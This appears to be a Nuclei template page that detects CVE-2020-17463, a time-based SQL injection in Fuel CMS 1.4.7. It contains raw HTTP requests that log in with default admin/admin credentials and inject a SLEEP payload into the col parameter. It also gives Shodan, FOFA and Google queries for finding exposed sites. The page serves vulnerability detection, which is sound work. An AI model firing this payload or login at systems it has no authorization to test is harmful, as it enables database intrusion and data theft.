Skip to content
Nuclei Templates

Fuel CMS 1.4.7 - SQL Injection

ID: CVE-2020-17463

Severity: critical

Author: Thirukrishnan

Tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio

Description

Section titled “Description”

FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.

YAML Source

Section titled “YAML Source”
id: CVE-2020-17463


info:
  name: Fuel CMS 1.4.7 - SQL Injection
  author: Thirukrishnan
  severity: critical
  description: |
    FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: Fixed in version 115
  reference:
    - https://www.exploit-db.com/exploits/48741
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17463
    - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
    - https://getfuelcms.com/
    - https://cwe.mitre.org/data/definitions/89.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17463
    cwe-id: CWE-89
    epss-score: 0.94399
    epss-percentile: 0.99154
    cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: thedaylightstudio
    product: fuel_cms
    shodan-query: http.title:"fuel cms"
    fofa-query: title="fuel cms"
    google-query: intitle:"fuel cms"
  tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio


http:
  - raw:
      - |
        GET /fuel/login/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /fuel/login/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}


        user_name={{username}}&password={{password}}&Login=Login&forward=
      - |
        @timeout: 10s
        GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}


    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_3 == 200'
          - 'contains(body_1, "FUEL CMS")'
        condition: and
# digest: 4a0a0047304502205d46eea9079112ab4d7a573b4e658911e245f87b587362e10b96aff39d0a6299022100b0c69acc893decd0afe47119ef5606f303ced940c0042b396149851b1520f4df:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17463.yaml"

View on Github